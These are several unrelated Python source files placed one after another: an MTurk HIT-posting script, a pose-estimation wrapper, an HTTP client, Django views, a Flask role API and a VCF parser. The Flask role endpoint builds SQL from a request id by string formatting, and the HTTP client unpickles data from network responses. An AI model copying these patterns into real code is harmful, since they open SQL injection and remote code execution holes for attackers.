"If you would like to find out more about this project please visit our Open Science Project" \
"at https://osf.io/8bma7/ or consider backing our project on " \
"Experiment: https://experiment.com/projects/crowdsourcing-the-analysis-of-sleep-can-the-public-be-sleep-scientists"
keywords = ["sleep", "scoring","spindles","spindle","brainwaves", "MODA", "psych", "annotation"]
frame_height = 800 # the height of the iframe holding the external hit
questionform = boto.mturk.question.ExternalQuestion(self.url + '?currentPhase=practice', frame_height)
quals = Qualifications()
quals.add(Requirement('000000000000000000L0', 'GreaterThanOrEqualTo', '95')) #'Worker_PercentHITsApproved'
quals.add(Requirement(phasesQualID[host]['practice'], 'DoesNotExist'))
quals.add(Requirement(phasesQualID[host]['phase1'], 'DoesNotExist'))
if host != 'sandbox':
if testing:
quals.add(Requirement(testingQual, 'Exists'))
else:
quals.add(Requirement('00000000000000000040', 'GreaterThanOrEqualTo', '100')) #'Worker_NumberHITsApproved'
i=0
for i in range(1, num_hits+1):
self.mturk.create_hit(
title=title,
description=description,
keywords=keywords,
question=questionform,
reward=boto.mturk.price.Price(amount=amount),
lifetime=datetime.timedelta(4),
duration=datetime.timedelta(minutes=30),
qualifications=quals,
response_groups=('Minimal', 'HITDetail'), # I don't know what response groups are
)
print('Posted ' + str(i) + ' practice HITS @ $' + str(amount))
def post_futher_hits(self, num_hits, amount, testing=False):
url = "https://shrouded-plains-8041.herokuapp.com/"
title = "Find patterns in sleeping brainwaves"
description = "Expected HIT completion time is ~3 mins.\n\n" \
"Your job is to find patterns in recordings of the sleeping brain! Help science understand " \
"sleep and its memory benefits. \n" \
"This project is run by the MODA team at University of California, Riverside." \
"If you would like to find out more about this project please visit our Open Science Project" \
"at https://osf.io/8bma7/ or consider backing our project on " \
"Experiment: https://experiment.com/projects/crowdsourcing-the-analysis-of-sleep-can-the-public-be-sleep-scientists"
keywords = ["sleep", "scoring", "spindles", "spindle", "brainwaves", "MODA", "psych", "annotation"]
frame_height = 800 # the height of the iframe holding the external hit
questionform = boto.mturk.question.ExternalQuestion(url + '?currentPhase=phase1', frame_height)
quals = Qualifications()
quals.add(Requirement('000000000000000000L0', 'GreaterThanOrEqualTo', '95')) #'Worker_PercentHITsApproved'
quals.add(Requirement(phasesQualID[host]['practice'], 'Exists'))
quals.add(Requirement(phasesQualID[host]['phase1'], 'DoesNotExist'))
if host != 'sandbox':
if testing:
quals.add(Requirement(testingQual, 'Exists'))
else:
quals.add(Requirement('00000000000000000040', 'GreaterThanOrEqualTo', '100')) #'Worker_NumberHITsApproved'
# quals.add(LocaleRequirement('In', ['US','IN'])) #locale
# quals.add(LocaleRequirement('EqualTo', 'IN')) #locale
i = 0
for i in range(1, num_hits+1):
create_hit_result = self.mturk.create_hit(
title=title,
description=description,
keywords=keywords,
question=questionform,
reward=boto.mturk.price.Price(amount=amount),
lifetime=datetime.timedelta(4),
duration=datetime.timedelta(minutes=30),
qualifications=quals,
response_groups=('Minimal', 'HITDetail'), # I don't know what response groups are
)
print('Posted ' + str(i) + ' further HITS @ $' + str(amount))
mtt = MturkTools()
#mtt.post_prac_hits(100, 0.20)
#mtt.post_futher_hits(100, 0.13)
# mtt.expire_remaining_hits()
# mtt.save_mturk_data()
mtt.get_all_user_data_from_aws()
mtt.parse_aws_to_csv()
#mtt.approve_hits()
#mtt.remove_qualifications('practice')
# mtt.mturk.notify_workers('AR72L0JX4D03W',
# 'Spindle Detection on MODA',
# 'Hi There!,'
# 'Thanks for completing spindle detection HITs. '
# 'Unfortunately the data for you HITs is missing. '
# 'This is most likely an error with the spindle detection program. '
# 'Can you help me debug this by replying with your operating system, browser type and version'
# 'and if you saw any strange behaviour in the spindle detection program.')
|
<reponame>galvinw/fairmotdocker<gh_stars>0
import glob
import numpy as np
import torchvision
import torch
from PIL import Image, ImageFile
from openpifpaf.network import nets
from openpifpaf import decoder
from .process import image_transform
class ImageList(torch.utils.data.Dataset):
"""It defines transformations to apply to images and outputs of the dataloader"""
def __init__(self, image_paths, scale):
self.image_paths = image_paths
self.scale = scale
def __getitem__(self, index):
image_path = self.image_paths[index]
ImageFile.LOAD_TRUNCATED_IMAGES = True
with open(image_path, 'rb') as f:
image = Image.open(f).convert('RGB')
if self.scale > 1.01 or self.scale < 0.99:
image = torchvision.transforms.functional.resize(image,
(round(self.scale * image.size[1]),
round(self.scale * image.size[0])),
interpolation=Image.BICUBIC)
# PIL images are not iterables
original_image = torchvision.transforms.functional.to_tensor(image) # 0-255 --> 0-1
image = image_transform(image)
return image_path, original_image, image
def __len__(self):
return len(self.image_paths)
def factory_from_args(args):
# Merge the model_pifpaf argument
# if not args.checkpoint:
args.checkpoint = 'resnet152' # Default model Resnet 152
# glob
args.webcam = True
if not args.webcam:
if args.glob:
args.images += glob.glob(args.glob)
if not args.images:
raise Exception("no image files given")
# add args.device
args.device = torch.device('cpu')
args.pin_memory = False
if torch.cuda.is_available():
args.device = torch.device('cuda')
args.pin_memory = True
# Add num_workers
args.loader_workers = 8
# Add visualization defaults
args.figure_width = 10
args.dpi_factor = 1.0
return args
class PifPaf:
def __init__(self, args):
"""Instanciate the mdodel"""
factory_from_args(args)
model_pifpaf, _ = nets.factory_from_args(args)
model_pifpaf = model_pifpaf.to(args.device)
self.processor = decoder.factory_from_args(args, model_pifpaf)
self.keypoints_whole = []
# Scale the keypoints to the original image size for printing (if not webcam)
if not args.webcam:
self.scale_np = np.array([args.scale, args.scale, 1] * 17).reshape(17, 3)
else:
self.scale_np = np.array([1, 1, 1] * 17).reshape(17, 3)
def fields(self, processed_images):
"""Encoder for pif and paf fields"""
fields_batch = self.processor.fields(processed_images)
return fields_batch
def forward(self, image, processed_image_cpu, fields):
"""Decoder, from pif and paf fields to keypoints"""
self.processor.set_cpu_image(image, processed_image_cpu)
keypoint_sets, scores = self.processor.keypoint_sets(fields)
if keypoint_sets.size > 0:
self.keypoints_whole.append(np.around((keypoint_sets / self.scale_np), 1)
.reshape(keypoint_sets.shape[0], -1).tolist())
pifpaf_out = [
{'keypoints': np.around(kps / self.scale_np, 1).reshape(-1).tolist(),
'bbox': [np.min(kps[:, 0]) / self.scale_np[0, 0], np.min(kps[:, 1]) / self.scale_np[0, 0],
np.max(kps[:, 0]) / self.scale_np[0, 0], np.max(kps[:, 1]) / self.scale_np[0, 0]]}
for kps in keypoint_sets
]
return keypoint_sets, scores, pifpaf_out
|
# -*- coding: utf-8 -*-
"""
Http client for backup or other modules.
"""
import pickle
from datetime import datetime
from pathlib import Path
import requests
from src.utils_v1.flask_rangerequest import RangeRequest
from src.utils.file_manager import fm
from src.utils.http_exception import InvalidParameterException, FileNotFoundException
class HttpClient:
def __init__(self):
self.timeout = 30
def _check_status_code(self, r, expect_code):
if r.status_code != expect_code:
raise InvalidParameterException(msg=f'[HttpClient] Failed to {r.request.method} ({r.request.url}) '
f'with status code: {r.status_code}, {r.text}')
def _raise_http_exception(self, url, method, e):
raise InvalidParameterException(msg=f'[HttpClient] Failed to {method} ({url}) with exception: {str(e)}')
def get(self, url, access_token, is_body=True, **kwargs):
try:
headers = {"Content-Type": "application/json", "Authorization": "token " + access_token}
r = requests.get(url, headers=headers, timeout=self.timeout, **kwargs)
self._check_status_code(r, 200)
return r.json() if is_body else r
except Exception as e:
self._raise_http_exception(url, 'GET', e)
def get_to_file(self, url, access_token, file_path: Path):
r = self.get(url, access_token, is_body=False, stream=True)
fm.write_file_by_response(r, file_path, is_temp=True)
def post(self, url, access_token, body, is_json=True, is_body=True, success_code=201, **kwargs):
try:
headers = dict()
if access_token:
headers["Authorization"] = "token " + access_token
if is_json:
headers['Content-Type'] = 'application/json'
r = requests.post(url, headers=headers, json=body, timeout=self.timeout, **kwargs) \
if is_json else requests.post(url, headers=headers, data=body, timeout=self.timeout, **kwargs)
self._check_status_code(r, success_code)
return r.json() if is_body else r
except Exception as e:
self._raise_http_exception(url, 'POST', e)
def post_file(self, url, access_token, file_path: str):
with open(file_path, 'rb') as f:
self.post(url, access_token, body=f, is_json=False, is_body=False)
def post_to_file(self, url, access_token, file_path: Path, body=None, is_temp=False):
r = self.post(url, access_token, body, is_json=False, is_body=False, stream=True)
fm.write_file_by_response(r, file_path, is_temp)
def post_to_pickle_data(self, url, access_token, body=None):
r = self.post(url, access_token, body, is_json=False, is_body=False, stream=True)
return pickle.loads(r.content)
def put(self, url, access_token, body, is_body=False):
try:
headers = {"Authorization": "token " + access_token}
r = requests.put(url, headers=headers, data=body, timeout=self.timeout)
self._check_status_code(r, 200)
return r.json() if is_body else r
except Exception as e:
self._raise_http_exception(url, 'PUT', e)
def put_file(self, url, access_token, file_path: Path):
with open(file_path.as_posix(), 'br') as f:
self.put(url, access_token, f, is_body=False)
def delete(self, url, access_token):
try:
headers = {"Authorization": "token " + access_token}
r = requests.delete(url, headers=headers, timeout=self.timeout)
self._check_status_code(r, 204)
except Exception as e:
self._raise_http_exception(url, 'DELETE', e)
class HttpServer:
def __init__(self):
pass
def create_range_request(self, file_path: Path):
if not file_path.exists() or not file_path.is_file():
raise FileNotFoundException(msg='Failed to get file for creating range request object.')
with open(file_path.as_posix(), 'rb') as f:
etag = RangeRequest.make_etag(f)
return RangeRequest(open(file_path.as_posix(), 'rb'),
etag=etag,
last_modified=datetime.utcnow(),
size=file_path.stat().st_size).make_response()
|
"""Volume Views"""
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.auth.mixins import \
PermissionRequiredMixin as DjangoPermissionRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.shortcuts import reverse
from django.utils.translation import gettext as _
from django.views.generic import DeleteView, DetailView, ListView, UpdateView
from guardian.mixins import PermissionListMixin, PermissionRequiredMixin
from guardian.shortcuts import get_objects_for_user
from p2.core.forms import VolumeForm
from p2.core.models import Component, Volume
from p2.lib.reflection import class_to_path
from p2.lib.reflection.manager import ControllerManager
from p2.lib.views import CreateAssignPermView
COMPONENT_MANAGER = ControllerManager('component.controllers')
class VolumeListView(PermissionListMixin, LoginRequiredMixin, ListView):
"""List all volumes a user can use"""
model = Volume
permission_required = 'p2_core.view_volume'
ordering = 'name'
paginate_by = 10
class VolumeDetailView(PermissionRequiredMixin, DetailView):
"""Show volume overview and all components activated/available"""
model = Volume
permission_required = 'p2_core.view_volume'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
components = []
existing_components = get_objects_for_user(self.request.user, 'p2_core.view_component')
for controller in COMPONENT_MANAGER.list():
controller_path = class_to_path(controller)
# Check if component for this volume is configure
existing_component = existing_components.filter(
controller_path=controller_path,
volume=self.object)
if existing_component.exists():
components.append(existing_component.first())
else:
# Create an in-memory Object with the controller_path assigned
_component = Component()
_component.controller_path = controller_path
_component.volume = self.object
# Set an extra attribute so the template can reflect it
_component.configured = False
_component.enabled = False
components.append(_component)
context['components'] = components
return context
class VolumeCreateView(SuccessMessageMixin, DjangoPermissionRequiredMixin, CreateAssignPermView):
"""Create new volume"""
model = Volume
form_class = VolumeForm
permission_required = 'p2_core.add_volume'
template_name = 'generic/form.html'
success_message = _('Successfully created Volume')
permissions = [
'p2_core.view_volume',
'p2_core.use_volume',
'p2_core.change_volume',
'p2_core.delete_volume',
]
def get_success_url(self):
return reverse('p2_ui:core-volume-list')
class VolumeUpdateView(SuccessMessageMixin, PermissionRequiredMixin, UpdateView):
"""Update existing volume"""
model = Volume
form_class = VolumeForm
permission_required = 'p2_core.change_volume'
template_name = 'generic/form.html'
success_message = _('Successfully updated Volume')
def get_success_url(self):
return reverse('p2_ui:core-volume-list')
class VolumeDeleteView(SuccessMessageMixin, PermissionRequiredMixin, DeleteView):
"""Delete volume"""
model = Volume
permission_required = 'p2_core.delete_volume'
template_name = 'generic/delete.html'
success_message = _('Successfully deleted Volume')
def get_success_url(self):
return reverse('p2_ui:core-volume-list')
def delete(self, request, *args, **kwargs):
obj = self.get_object()
messages.success(self.request, self.success_message % obj.__dict__)
return super().delete(request, *args, **kwargs)
|
<reponame>xuannanxan/maitul-manage
from flask_restful import Resource,reqparse,fields,marshal,abort
from app.apis.api_constant import *
from app.models import Role,RoleRule, Crud
from app.utils import object_to_json,mysql_to_json
from app.apis.admin.common import login_required,permission_required
from app.utils.api_doc import Apidoc
from app.api_docs.admin import role_doc as doc
from flask import g
from app.config import PAGINATE_NUM
import json
api = Apidoc('系统-角色管理')
# 单数据操作
parse_id = reqparse.RequestParser()
parse_id.add_argument('id',type=str)
parse_base = parse_id.copy()
parse_base.add_argument('name',type=str,required=True,help='请输入名称')
parse_base.add_argument('info',type=str)
parse_rules = parse_id.copy()
parse_rules.add_argument('rules',type=str,required=True,help='请配置权限')
_fields = {
'name':fields.String,
'info':fields.String,
'id':fields.String,
}
sing_fields = {
'status':fields.Integer,
'msg':fields.String,
'data':fields.Nested(_fields)
}
def getSingData(id):
data = Role.query.filter_by(id = id , is_del = '0').first()
if not data :
abort(RET.NotFound,msg='角色不存在')
return data
class RoleAuthResource(Resource):
@api.doc(api_doc=doc.auth)
@login_required
@permission_required
def post(self):
'''
角色授权
'''
args = parse_rules.parse_args()
id = args.get('id')
if not id:
abort(RET.BadRequest,msg='请勿非法操作')
sing_data = getSingData(id)
rules = json.loads(args.get('rules'))
# 清空原来的rules
old_data = RoleRule.query.filter_by(role_id = id ).all()
if old_data :
Crud.clean_all(old_data)
#没有设置任何权限点就清空后返回
if not rules:
return {
'status':RET.OK,
'msg':'权限设置成功'
}
# 新增新的权限
relation_data = [RoleRule(
role_id = sing_data.id,
rule_id =v
) for v in rules ]
if Crud.add_all(relation_data):
sing_data.last_editor = g.admin.username
sing_data.updata()
return {
'status':RET.OK,
'msg':'权限设置成功'
}
abort(RET.BadRequest,msg='权限设置失败,请重试...')
class RoleResource(Resource):
@api.doc(api_doc=doc.add)
@login_required
@permission_required
def post(self):
'''
添加
'''
args = parse_base.parse_args()
name = args.get('name')
info = args.get('info')
_data = Role.query.filter_by(name = name,is_del = '0').first()
if _data:
abort(RET.Forbidden,msg='当前角色已存在')
model_data = Role()
model_data.name = name
model_data.info = info
model_data.last_editor = g.admin.username
if model_data.add():
data = {
'status':RET.Created,
'msg':'添加成功',
'data':model_data
}
return marshal(data,sing_fields)
abort(RET.BadRequest,msg='添加失败,请重试')
@api.doc(api_doc=doc.put)
@login_required
@permission_required
def put(self):
'''
修改
'''
args = parse_base.parse_args()
id = args.get('id')
if not id:
abort(RET.BadRequest,msg='请勿非法操作')
sing_data = getSingData(id)
name = args.get('name')
info = args.get('info')
# 如果名称存在,并且ID不是当前ID
_data = Role.query.filter(Role.id != id , Role.is_del == '0',Role.name == name).first()
if _data:
abort(RET.Forbidden,msg='角色已存在')
sing_data.name = name
sing_data.info = info
sing_data.last_editor = g.admin.username
result = sing_data.updata()
if result:
data = {
'status':RET.OK,
'msg':'修改成功',
'data':sing_data
}
return marshal(data,sing_fields)
abort(RET.BadRequest,msg='修改失败,请重试')
@api.doc(api_doc=doc.lst)
@login_required
@permission_required
def get(self):
'''
获取数据,如果有ID就是单个数据,没有就是全部数据
'''
args_id = parse_id.parse_args()
id = args_id.get('id')
if id:
sql = '''
SELECT j.*,GROUP_CONCAT(r.rule_id SEPARATOR ',') as rules
FROM role as j
left join role_rule as r on j.id = r.role_id
WHERE j.is_del = 0 AND j.id = %s
'''%id
sql_data = Crud.auto_select(sql)
first_data = sql_data.first()
if not first_data:
abort(RET.NotFound,msg='角色不存在')
return {
'status':RET.OK,
'data':mysql_to_json(dict(first_data))
}
_list = Role.query.filter_by(is_del = '0').all()
if not _list:
abort(RET.BadRequest,msg='暂无数据')
data = {
'status':RET.OK,
'data':[object_to_json(v) for v in _list]
}
return data
@api.doc(api_doc=doc.delete)
@login_required
@permission_required
def delete(self):
'''
删除
'''
args = parse_id.parse_args()
id = args.get('id')
if not id:
abort(RET.BadRequest,msg='请勿非法操作')
sing_data = getSingData(id)
sing_data.last_editor = g.admin.username
result = sing_data.delete()
# 清空原来的授权
_auth = RoleRule.query.filter_by(role_id = id ).all()
if _auth :
Crud.clean_all(_auth)
if result:
return {
'status':RET.OK,
'msg':'删除成功'
}
abort(RET.BadRequest,msg='删除失败,请重试')
|
<filename>mi/dataset/driver/moas/gl/parad/test/test_driver.py
"""
@package mi.dataset.driver.moas.gl.parad.test.test_driver
@file marine-integrations/mi/dataset/driver/moas/gl/parad/test/test_driver.py
@author <NAME>
@brief Test cases for glider parad data
USAGE:
Make tests verbose and provide stdout
* From the IDK
$ bin/dsa/test_driver
$ bin/dsa/test_driver -i [-t testname]
$ bin/dsa/test_driver -q [-t testname]
"""
__author__ = '<NAME>'
__license__ = 'Apache 2.0'
import unittest
from nose.plugins.attrib import attr
from mi.core.log import get_logger ; log = get_logger()
from exceptions import Exception
from mi.idk.dataset.unit_test import DataSetTestCase
from mi.idk.dataset.unit_test import DataSetIntegrationTestCase
from mi.idk.dataset.unit_test import DataSetQualificationTestCase
from mi.idk.exceptions import SampleTimeout
from mi.dataset.dataset_driver import DataSourceConfigKey, DataSetDriverConfigKeys
from mi.dataset.dataset_driver import DriverParameter
from mi.dataset.driver.moas.gl.parad.driver import PARADDataSetDriver
from mi.dataset.parser.glider import ParadTelemeteredDataParticle
from pyon.agent.agent import ResourceAgentState
from interface.objects import ResourceAgentErrorEvent
DataSetTestCase.initialize(
driver_module='mi.dataset.driver.moas.gl.parad.driver',
driver_class="PARADDataSetDriver",
agent_resource_id = '123xyz',
agent_name = 'Agent007',
agent_packet_config = PARADDataSetDriver.stream_config(),
startup_config = {
DataSourceConfigKey.HARVESTER:
{
DataSetDriverConfigKeys.DIRECTORY: '/tmp/paradtest',
DataSetDriverConfigKeys.STORAGE_DIRECTORY: '/tmp/stored_paradtest',
DataSetDriverConfigKeys.PATTERN: '*.mrg',
DataSetDriverConfigKeys.FREQUENCY: 1,
},
DataSourceConfigKey.PARSER: {}
}
)
SAMPLE_STREAM = 'parad_m_glider_instrument'
###############################################################################
# UNIT TESTS #
# Device specific unit tests are for #
# testing device specific capabilities #
###############################################################################
@attr('INT', group='mi')
class IntegrationTest(DataSetIntegrationTestCase):
def test_get(self):
"""
Test that we can get data from files. Verify that the driver sampling
can be started and stopped.
"""
self.clear_sample_data()
# Start sampling and watch for an exception
self.driver.start_sampling()
self.clear_async_data()
self.create_sample_data('single_glider_record.mrg', "CopyOf-single_glider_record.mrg")
# Results file, Number of Particles (rows) expected to compare, timeout
self.assert_data(ParadTelemeteredDataParticle, 'single_parad_record.mrg.result.yml', count=1, timeout=10)
self.clear_async_data()
self.create_sample_data('multiple_glider_record.mrg', "CopyOf-multiple_glider_record.mrg")
# Results file, Number of Particles (rows) expected to compare, timeout
self.assert_data(ParadTelemeteredDataParticle, 'multiple_parad_record.mrg.result.yml', count=4, timeout=10)
log.debug("IntegrationTest.test_get(): Start second file ingestion")
self.clear_async_data()
self.create_sample_data('unit_247_2012_051_0_0-sciDataOnly.mrg', "CopyOf-unit_247_2012_051_0_0-sciDataOnly.mrg")
self.assert_data(ParadTelemeteredDataParticle, count=115, timeout=30)
def test_stop_resume(self):
"""
Test the ability to stop and restart the process
"""
path_1 = self.create_sample_data('single_glider_record.mrg', "CopyOf-single_glider_record.mrg")
path_2 = self.create_sample_data('multiple_glider_record.mrg', "CopyOf-multiple_glider_record.mrg")
# Create and store the new driver state
state = {
'CopyOf-single_glider_record.mrg': self.get_file_state(path_1, True, 1160),
'CopyOf-multiple_glider_record.mrg': self.get_file_state(path_2, False, 10537)
}
self.driver = self._get_driver_object(memento=state)
# create some data to parse
self.clear_async_data()
self.driver.start_sampling()
# verify data is produced
self.assert_data(ParadTelemeteredDataParticle, 'merged_parad_record.mrg.result.yml', count=3, timeout=10)
def test_stop_start_ingest(self):
"""
Test the ability to stop and restart sampling, and ingesting files in the correct order
"""
# create some data to parse
self.clear_async_data()
self.driver.start_sampling()
self.create_sample_data('single_glider_record.mrg', "CopyOf-single_glider_record.mrg")
self.create_sample_data('multiple_glider_record.mrg', "xCopyOf-multiple_glider_record.mrg")
self.assert_data(ParadTelemeteredDataParticle, 'single_parad_record.mrg.result.yml', count=1, timeout=10)
self.assert_file_ingested("CopyOf-single_glider_record.mrg")
self.assert_file_not_ingested("xCopyOf-multiple_glider_record.mrg")
self.driver.stop_sampling()
self.driver.start_sampling()
self.assert_data(ParadTelemeteredDataParticle, 'multiple_parad_record.mrg.result.yml', count=4, timeout=10)
self.assert_file_ingested("xCopyOf-multiple_glider_record.mrg")
def test_bad_sample(self):
"""
Test a bad sample. To do this we set a state to the middle of a record
"""
# create some data to parse
self.clear_async_data()
path = self.create_sample_data('multiple_glider_record.mrg', "CopyOf-multiple_glider_record.mrg")
# Create and store the new driver state
state = {
'CopyOf-multiple_glider_record.mrg': self.get_file_state(path, False, 12167),
}
self.driver = self._get_driver_object(memento=state)
self.driver.start_sampling()
# verify data is produced
self.assert_data(ParadTelemeteredDataParticle, 'bad_sample_parad_record.mrg.result.yml', count=1, timeout=10)
self.assert_file_ingested("CopyOf-multiple_glider_record.mrg")
def test_sample_exception(self):
"""
test that a file is marked as parsed if it has a sample exception (which will happen with an empty file)
"""
self.clear_async_data()
config = self._driver_config()['startup_config']['harvester']['pattern']
filename = config.replace("*", "foo")
self.create_sample_data(filename)
# Start sampling and watch for an exception
self.driver.start_sampling()
# an event catches the sample exception
self.assert_event('ResourceAgentErrorEvent')
self.assert_file_ingested(filename)
###############################################################################
# QUALIFICATION TESTS #
# Device specific qualification tests are for #
# testing device specific capabilities #
###############################################################################
@attr('QUAL', group='mi')
class QualificationTest(DataSetQualificationTestCase):
def setUp(self):
super(QualificationTest, self).setUp()
def test_publish_path(self):
"""
Setup an agent/driver/harvester/parser and verify that data is
published out the agent
"""
self.create_sample_data('single_glider_record.mrg', 'CopyOf-single_glider_record.mrg')
self.assert_initialize()
# Verify we get one sample
try:
result = self.data_subscribers.get_samples(SAMPLE_STREAM)
log.debug("RESULT: %s", result)
# Verify values
self.assert_data_values(result, 'single_parad_record.mrg.result.yml')
except Exception as e:
log.error("Exception trapped: %s", e)
self.fail("Sample timeout.")
def test_large_import(self):
"""
There is a bug when activating an instrument go_active times out and
there was speculation this was due to blocking behavior in the agent.
https://jira.oceanobservatories.org/tasks/browse/OOIION-1284
"""
self.create_sample_data('unit_247_2012_051_0_0-sciDataOnly.mrg')
self.assert_initialize()
result = self.get_samples(SAMPLE_STREAM, 115, 120)
def test_stop_start(self):
"""
Test the agents ability to start data flowing, stop, then restart
at the correct spot.
"""
log.info("CONFIG: %s", self._agent_config())
self.create_sample_data('single_glider_record.mrg', "CopyOf-single_glider_record.mrg")
self.assert_initialize(final_state=ResourceAgentState.COMMAND)
# Slow down processing to 1 per second to give us time to stop
self.dataset_agent_client.set_resource({DriverParameter.RECORDS_PER_SECOND: 1})
self.assert_start_sampling()
# Verify we get one sample
try:
# Read the first file and verify the data
result = self.get_samples(SAMPLE_STREAM)
log.debug("RESULT: %s", result)
# Verify values
self.assert_data_values(result, 'single_parad_record.mrg.result.yml')
self.assert_sample_queue_size(SAMPLE_STREAM, 0)
self.create_sample_data('multiple_glider_record.mrg', "CopyOf-multiple_glider_record.mrg")
# Now read the first three records of the second file then stop
result = self.get_samples(SAMPLE_STREAM, 1)
log.debug("got result 1 %s", result)
self.assert_stop_sampling()
self.assert_sample_queue_size(SAMPLE_STREAM, 0)
# Restart sampling and ensure we get the last 5 records of the file
self.assert_start_sampling()
result = self.get_samples(SAMPLE_STREAM, 3)
log.debug("got result 2 %s", result)
self.assert_data_values(result, 'merged_parad_record.mrg.result.yml')
self.assert_sample_queue_size(SAMPLE_STREAM, 0)
except SampleTimeout as e:
log.error("Exception trapped: %s", e, exc_info=True)
self.fail("Sample timeout.")
def test_shutdown_restart(self):
"""
Test the agents ability to completely stop, then restart
at the correct spot.
"""
log.info("CONFIG: %s", self._agent_config())
self.create_sample_data('single_glider_record.mrg', "CopyOf-single_glider_record.mrg")
self.assert_initialize(final_state=ResourceAgentState.COMMAND)
# Slow down processing to 1 per second to give us time to stop
self.dataset_agent_client.set_resource({DriverParameter.RECORDS_PER_SECOND: 1})
self.assert_start_sampling()
# Verify we get one sample
try:
# Read the first file and verify the data
result = self.get_samples(SAMPLE_STREAM)
log.debug("RESULT: %s", result)
# Verify values
self.assert_data_values(result, 'single_parad_record.mrg.result.yml')
self.assert_sample_queue_size(SAMPLE_STREAM, 0)
self.create_sample_data('multiple_glider_record.mrg', "CopyOf-multiple_glider_record.mrg")
# Now read the first records of the second file then stop
result = self.get_samples(SAMPLE_STREAM, 1)
log.debug("got result 1 %s", result)
self.assert_stop_sampling()
self.assert_sample_queue_size(SAMPLE_STREAM, 0)
# stop the agent
self.stop_dataset_agent_client()
# re-start the agent
self.init_dataset_agent_client()
#re-initialize
self.assert_initialize(final_state=ResourceAgentState.COMMAND)
# Restart sampling and ensure we get the last 5 records of the file
self.assert_start_sampling()
result = self.get_samples(SAMPLE_STREAM, 3)
log.debug("got result 2 %s", result)
self.assert_data_values(result, 'merged_parad_record.mrg.result.yml')
self.assert_sample_queue_size(SAMPLE_STREAM, 0)
except SampleTimeout as e:
log.error("Exception trapped: %s", e, exc_info=True)
self.fail("Sample timeout.")
def test_parser_exception(self):
"""
Test an exception raised after the driver is started during
record parsing.
"""
self.clear_sample_data()
self.create_sample_data('unit_363_2013_245_7_7.mrg')
self.assert_initialize()
self.event_subscribers.clear_events()
self.assert_sample_queue_size(SAMPLE_STREAM, 0)
# Verify an event was raised and we are in our retry state
self.assert_event_received(ResourceAgentErrorEvent, 40)
self.assert_state_change(ResourceAgentState.STREAMING, 10)
|
<filename>vcfpy/parser.py
# -*- coding: utf-8 -*-
"""Parsing of VCF files from ``str``
"""
import ast
import functools
import math
import re
import warnings
from . import header
from . import record
from . import exceptions
from .exceptions import (
CannotConvertValue,
LeadingTrailingSpaceInKey,
UnknownFilter,
UnknownVCFVersion,
SpaceInChromLine,
)
from .compat import OrderedDict
__author__ = "<NAME> <<EMAIL>>"
# expected "#CHROM" header prefix when there are samples
REQUIRE_SAMPLE_HEADER = ("#CHROM", "POS", "ID", "REF", "ALT", "QUAL", "FILTER", "INFO", "FORMAT")
# expected "#CHROM" header prefix when there are no samples
REQUIRE_NO_SAMPLE_HEADER = ("#CHROM", "POS", "ID", "REF", "ALT", "QUAL", "FILTER", "INFO")
#: Supported VCF versions, a warning will be issued otherwise
SUPPORTED_VCF_VERSIONS = ("VCFv4.0", "VCFv4.1", "VCFv4.2", "VCFv4.3")
class QuotedStringSplitter:
"""Helper class for splitting quoted strings
Has support for interpreting quoting strings but also brackets. Meant
for splitting the VCF header line dicts
"""
#: state constant for normal
NORMAL = 0
#: state constant for quoted
QUOTED = 1
#: state constant for delimiter
ESCAPED = 2
#: state constant for array
ARRAY = 3
#: state constant for delimiter
DELIM = 4
def __init__(self, delim=",", quote='"', brackets="[]"):
#: string delimiter
self.delim = delim
#: quote character
self.quote = quote
#: two-character string with opening and closing brackets
assert len(brackets) == 2
self.brackets = brackets
def run(self, s):
"""Split string ``s`` at delimiter, correctly interpreting quotes
Further, interprets arrays wrapped in one level of ``[]``. No
recursive brackets are interpreted (as this would make the grammar
non-regular and currently this complexity is not needed). Currently,
quoting inside of braces is not supported either. This is just to
support the example from VCF v4.3.
"""
begins, ends = [0], []
# transition table
DISPATCH = {
self.NORMAL: self._handle_normal,
self.QUOTED: self._handle_quoted,
self.ARRAY: self._handle_array,
self.DELIM: self._handle_delim,
self.ESCAPED: self._handle_escaped,
}
# run state automaton
state = self.NORMAL
for pos, c in enumerate(s):
state = DISPATCH[state](c, pos, begins, ends)
ends.append(len(s))
assert len(begins) == len(ends)
# Build resulting list
return [s[start:end] for start, end in zip(begins, ends)]
def _handle_normal(self, c, pos, begins, ends): # pylint: disable=W0613
if c == self.delim:
ends.append(pos)
return self.DELIM
elif c == self.quote:
return self.QUOTED
elif c == self.brackets[0]:
return self.ARRAY
else:
return self.NORMAL
def _handle_quoted(self, c, pos, begins, ends): # pylint: disable=W0613
if c == "\\":
return self.ESCAPED
elif c == self.quote:
return self.NORMAL
else:
return self.QUOTED
def _handle_array(self, c, pos, begins, ends): # pylint: disable=W0613
if c == self.brackets[1]:
return self.NORMAL
else:
return self.ARRAY
def _handle_delim(self, c, pos, begins, ends): # pylint: disable=W0613
begins.append(pos)
return self.NORMAL
def _handle_escaped(self, c, pos, begins, ends): # pylint: disable=W0613
return self.QUOTED
def split_quoted_string(s, delim=",", quote='"', brackets="[]"):
return QuotedStringSplitter(delim, quote, brackets).run(s)
def split_mapping(pair_str):
"""Split the ``str`` in ``pair_str`` at ``'='``
Warn if key needs to be stripped
"""
orig_key, value = pair_str.split("=", 1)
key = orig_key.strip()
if key != orig_key:
warnings.warn(
"Mapping key {} has leading or trailing space".format(repr(orig_key)),
LeadingTrailingSpaceInKey,
)
return key, value
def parse_mapping(value):
"""Parse the given VCF header line mapping
Such a mapping consists of "key=value" pairs, separated by commas and
wrapped into angular brackets ("<...>"). Strings are usually quoted,
for certain known keys, exceptions are made, depending on the tag key.
this, however, only gets important when serializing.
:raises: :py:class:`vcfpy.exceptions.InvalidHeaderException` if
there was a problem parsing the file
"""
if not value.startswith("<") or not value.endswith(">"):
raise exceptions.InvalidHeaderException(
"Header mapping value was not wrapped in angular brackets"
)
# split the comma-separated list into pairs, ignoring commas in quotes
pairs = split_quoted_string(value[1:-1], delim=",", quote='"')
# split these pairs into key/value pairs, converting flags to mappings
# to True
key_values = []
for pair in pairs:
if "=" in pair:
key, value = split_mapping(pair)
if value.startswith('"') and value.endswith('"'):
value = ast.literal_eval(value)
elif value.startswith("[") and value.endswith("]"):
value = [v.strip() for v in value[1:-1].split(",")]
else:
key, value = pair, True
key_values.append((key, value))
# return completely parsed mapping as OrderedDict
return OrderedDict(key_values)
class HeaderLineParserBase:
